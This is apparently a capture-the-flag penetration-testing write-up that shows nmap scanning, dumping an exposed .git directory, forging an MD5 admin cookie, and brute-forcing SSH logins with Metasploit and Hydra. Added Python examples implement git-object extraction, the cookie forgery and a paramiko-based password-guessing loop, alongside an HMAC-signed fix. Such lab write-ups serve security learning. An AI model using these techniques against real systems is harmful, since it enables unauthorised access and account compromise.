HackerEarth’s Cipher Combat 3.0 -VAPT

This write-up is based solely on Kali Linux and the tools that ship with it.

nmap is the tool used to gather information about the IP you want to enumerate. You can run it in any configuration, but this one is a good default: run as root, nmap performs a TCP SYN scan (it sends a SYN, reads the SYN/ACK and never completes the handshake), which is faster and less noisy than a full connect scan, and combining it with -A and -p- gives you the whole picture in a single run.

Changes you can try → swap -T3 for -T1, -T2 or -T4 depending on speed: higher numbers finish sooner but are more likely to be noticed or to miss ports on a slow link.

  • -A → enable OS detection, version detection, default script scanning and traceroute
  • -p- → scan all 65535 TCP ports instead of nmap's default top 1000

You can see that nmap has found a git repository for us (the http-git NSE script, which -A runs by default, reports a web-readable .git directory). Isn't that a jackpot? This task involves checking the repo out and pulling whatever information you can from it.

This task was pretty cool! It needs just a single tool → https://github.com/internetwache/GitTools

Read its documentation and use it.

Step 1: Use Dumper to download every object of the repository from the web server.

Step 2: Use Extractor to turn those objects back into the files of each commit, in a folder you can analyze.

(Screenshot: result from Dumper)
(Screenshot: result from Extractor)
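As an added example (not part of the original write-up, and not GitTools' own code), here is what Extractor does under the hood, in Python: it reads the loose objects that Dumper fetched, follows HEAD to the commit, walks the commit's tree down to every blob and writes the files out. The helper that builds a sample .git in a temporary directory is constructed for the demo; the file names and contents in it are made up. Packfiles are not handled, so on a real dump this only recovers files stored as loose objects.

```python
import hashlib
import os
import tempfile
import zlib

def read_object(git_dir, sha):
    """Inflate one loose object (.git/objects/xx/yyyy...) and return (type, payload)."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as fh:
        raw = zlib.decompress(fh.read())
    header, _, payload = raw.partition(b"\x00")      # header is b"<type> <size>"
    return header.split(b" ")[0].decode(), payload

def parse_tree(payload):
    """Yield (mode, name, sha) for each entry of a tree object's payload."""
    while payload:
        meta, _, rest = payload.partition(b"\x00")   # meta is b"<mode> <name>"
        mode, name = meta.decode().split(" ", 1)
        yield mode, name, rest[:20].hex()            # 20 raw SHA-1 bytes follow the name
        payload = rest[20:]

def head_commit(git_dir):
    """Resolve HEAD (a bare sha, or 'ref: refs/heads/<branch>') to a commit sha."""
    with open(os.path.join(git_dir, "HEAD")) as fh:
        head = fh.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(git_dir, head[len("ref: "):])) as fh:
            head = fh.read().strip()
    return head

def extract_commit(git_dir, commit_sha, out_dir):
    """Write every file reachable from commit_sha under out_dir; return their relative paths."""
    obj_type, payload = read_object(git_dir, commit_sha)
    if obj_type != "commit":
        raise ValueError(f"{commit_sha} is a {obj_type}, not a commit")
    tree_sha = payload.split(b"\n", 1)[0].split(b" ")[1].decode()   # first line: "tree <sha>"
    written = []

    def walk(sha, prefix):
        _, tree = read_object(git_dir, sha)
        for mode, name, entry_sha in parse_tree(tree):
            rel = os.path.join(prefix, name)
            if mode == "40000":                      # subdirectory: recurse
                walk(entry_sha, rel)
                continue
            _, blob = read_object(git_dir, entry_sha)
            dest = os.path.join(out_dir, rel)
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with open(dest, "wb") as fh:
                fh.write(blob)
            written.append(rel)

    walk(tree_sha, "")
    return sorted(written)

# --- constructed sample repository, so the extractor can be run offline ---

def write_object(git_dir, obj_type, payload):
    """Store a loose object the way git does: zlib over b"<type> <size>\\0" + payload."""
    raw = f"{obj_type} {len(payload)}\x00".encode() + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha

def build_sample_repo(base):
    """One commit with index.php and inc/config.php; file contents are made up for the demo."""
    git_dir = os.path.join(base, ".git")
    index = write_object(git_dir, "blob", b"<?php // constructed sample, not the challenge's index.php\n")
    config = write_object(git_dir, "blob", b"<?php // constructed sample include\n")
    inc = write_object(git_dir, "tree", b"100644 config.php\x00" + bytes.fromhex(config))
    root = write_object(git_dir, "tree", b"40000 inc\x00" + bytes.fromhex(inc)
                        + b"100644 index.php\x00" + bytes.fromhex(index))
    commit = write_object(git_dir, "commit",
                          f"tree {root}\nauthor a <a@example> 0 +0000\n\nsample\n".encode())
    os.makedirs(os.path.join(git_dir, "refs", "heads"), exist_ok=True)
    with open(os.path.join(git_dir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as fh:
        fh.write(commit + "\n")
    return git_dir

def demo():
    """Build the sample .git in a temp dir, extract HEAD, return {relative path: file bytes}."""
    base = tempfile.mkdtemp()
    git_dir = build_sample_repo(base)
    out = os.path.join(base, "extracted")
    return {p: open(os.path.join(out, p), "rb").read()
            for p in extract_commit(git_dir, head_commit(git_dir), out)}

if __name__ == "__main__":
    for path, data in demo().items():
        print(path, data.decode().rstrip())
```

To use it on a real dump, point `git_dir` at the `.git` folder Dumper produced and call `extract_commit(git_dir, head_commit(git_dir), out_dir)`; older commits (where a deleted password file often survives) are reached by reading the `parent` line of each commit payload and walking back.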

Run tree on the output directory to see the extracted commits, each in its own numbered folder, like this:

cat [name shown above]/index.php

This prints the content of index.php to the terminal. Now read the PHP carefully to find the passcode and how it is checked.

Result → I found that saving the passcode in MD5 form in a browser cookie would do the work for us.

Using JavaScript in the browser's developer console → document.cookie = "key=value"

And hence admin access was granted on the given link.
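Added example, not from the write-up or the challenge: the PHP source is not reproduced above, so the gate is modelled on the assumption that the server compares a cookie named `key` (the name from the document.cookie line) with md5(passcode). The passcode value, the helper names and the server key below are constructed for the demo. The first half builds the cookie the browser needs; the second half shows the fix the developer should have used, a value the server signs with a secret that never reaches the client, so reading the source no longer yields admin.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "key"                    # cookie name taken from the document.cookie line
PASSCODE = "sample-passcode"           # constructed stand-in for the value found in index.php
SERVER_KEY = secrets.token_bytes(32)   # hardened variant: a secret the client never sees

def forge_cookie(passcode, name=COOKIE_NAME):
    """The string to assign to document.cookie once the passcode is known."""
    return f"{name}={hashlib.md5(passcode.encode()).hexdigest()}"

def cookie_value(cookie_header, name=COOKIE_NAME):
    """Server side: pull one value out of a raw 'Cookie:' request header."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    return jar[name].value if name in jar else None

def weak_is_admin(value, passcode=PASSCODE):
    """Assumed model of the challenge's check: the cookie must equal md5(passcode).
    Anyone who can read the source (here, through the leaked .git) can compute this."""
    return value == hashlib.md5(passcode.encode()).hexdigest()

def issue_token(user, key=SERVER_KEY):
    """Hardened alternative: the server signs the identity with its own secret."""
    mac = hmac.new(key, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"

def strong_is_admin(token, key=SERVER_KEY):
    """Accept only tokens whose MAC verifies under the server key (constant-time compare)."""
    user, sep, mac = token.rpartition(".")
    if not sep:
        return False
    expected = hmac.new(key, user.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected) and user == "admin"

if __name__ == "__main__":
    forged = forge_cookie(PASSCODE)
    print("document.cookie =", repr(forged))
    print("weak check with forged cookie:", weak_is_admin(cookie_value(forged)))
    print("strong check with guessed token:", strong_is_admin("admin." + "0" * 64))
```

The root cause is the one the task demonstrates: the secret that gates admin lives in the source, and the source was published through `.git`. Hashing it before putting it in the cookie changes nothing, because the hash itself becomes the password.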

For this I activated the shell, and running various commands showed the user and the various files inside the system.

This was really fun, as the link provided wasn't actually a website but a system itself, with a new IP address.

The initial procedure was the same: run nmap and collect the details.

Observation → no open ports were found apart from ssh, which shows up in the result.

This task uses Metasploit (its ssh_login auxiliary module) as the tool. You can also try Hydra, a brute-force tool that supports SSH.

Procedure →

For a deeper understanding, check the Metasploit documentation.

Open a terminal (Metasploit):

msfconsole                                  // start msf
use auxiliary/scanner/ssh/ssh_login         // load the SSH login scanner
set RHOSTS [IP_of_target]                   // remote --> target ip
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt   // "user password" pairs, one per line
set STOP_ON_SUCCESS true                    // stop as soon as one pair works (must be set before run)
set VERBOSE false                           // hide the failed attempts
run                                         // run against the host

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ssh://[IP_Address]

-f —> stop as soon as a working login/password pair is found;
-L/-P —> paths to the username and password lists;
ssh://IP address —> the service and the victim's IP address.

Hydra's default of 16 parallel tasks is more than most OpenSSH servers accept at once (the MaxStartups limit), so if attempts fail with connection errors rather than rejected logins, lower the parallelism as hydra itself suggests with -t 4.
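Added example, not the write-up's own and not Metasploit or Hydra code: the loop both tools run, in Python, with the two wordlist layouts used above (Metasploit's "user password" USERPASS_FILE and Hydra's separate -L/-P lists) and the stop-on-success behaviour of STOP_ON_SUCCESS / -f. The credential list, the fake server and the admin:admin123 pair are constructed for the demo; the paramiko-backed attempt is optional and assumes the third-party paramiko package is installed.

```python
from typing import Callable, Iterable, Iterator, List, Tuple

Credential = Tuple[str, str]

def pairs_from_userpass_file(text: str) -> Iterator[Credential]:
    """Metasploit USERPASS_FILE layout (root_userpass.txt style): 'user password' per line."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            user, _, password = line.partition(" ")
            yield user, password

def pairs_from_lists(users: Iterable[str], passwords: Iterable[str]) -> Iterator[Credential]:
    """Hydra -L/-P default order: every password for the first user, then the next user."""
    passwords = list(passwords)
    for user in users:
        for password in passwords:
            yield user, password

def brute_force(attempt: Callable[[str, str], bool], candidates: Iterable[Credential],
                stop_on_success: bool = True) -> Tuple[List[Credential], int]:
    """Drive attempt(user, password) over candidates; return (valid logins, attempts made).
    stop_on_success mirrors msf's STOP_ON_SUCCESS and hydra's -f. attempt() returns True for
    a valid login, False for a rejected one, and raises OSError when the connection itself
    failed (the usual failure mode against an SSH server's MaxStartups limit), which is
    reported and skipped so one refused connection does not abort the whole run."""
    found: List[Credential] = []
    tried = 0
    for user, password in candidates:
        tried += 1
        try:
            ok = attempt(user, password)
        except OSError as exc:
            print(f"[!] {user}:{password} not tested, connection error: {exc}")
            continue
        if ok:
            print(f"[+] valid login {user}:{password}")
            found.append((user, password))
            if stop_on_success:
                break
    return found, tried

def paramiko_attempt(host: str, port: int = 22, timeout: float = 5.0) -> Callable[[str, str], bool]:
    """Real SSH attempt via the third-party paramiko library (imported lazily so the rest of
    this file runs without it). Only use against hosts you are authorised to test."""
    import paramiko

    def attempt(user: str, password: str) -> bool:
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(host, port=port, username=user, password=password, timeout=timeout,
                           allow_agent=False, look_for_keys=False)
            return True
        except paramiko.AuthenticationException:
            return False
        except paramiko.SSHException as exc:   # banner/transport trouble: treat as connection error
            raise OSError(str(exc)) from exc
        finally:
            client.close()
    return attempt

# constructed sample in root_userpass.txt layout; only admin:admin123 is valid on the fake server
SAMPLE_USERPASS = """# user password
root root
root toor
admin admin123
"""

def demo() -> Tuple[List[Credential], int]:
    """Offline run against a fake server that accepts only admin:admin123."""
    def fake_attempt(user: str, password: str) -> bool:
        return (user, password) == ("admin", "admin123")
    return brute_force(fake_attempt, pairs_from_userpass_file(SAMPLE_USERPASS))

if __name__ == "__main__":
    print(demo())
    # against a real target you are allowed to test:
    # brute_force(paramiko_attempt("[IP_Address]"), pairs_from_lists(users, passwords))
```

Because the loop opens a fresh connection per attempt, it is as noisy as the tools it imitates: every try lands in the target's auth log, and fail2ban-style lockouts or MaxStartups will start refusing connections long before a large wordlist is exhausted, which is exactly what the OSError branch reports.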

Damn! You have just brute-forced the client.

We have a shell now →

sessions -i 1   // interact with the session ssh_login opened
id              // the uid, gid and groups we landed as
uname -a        // kernel and OS details (not the username)
exit            // leave the shell

Thanks for reading!!

Please upvote! 🙇‍♂️
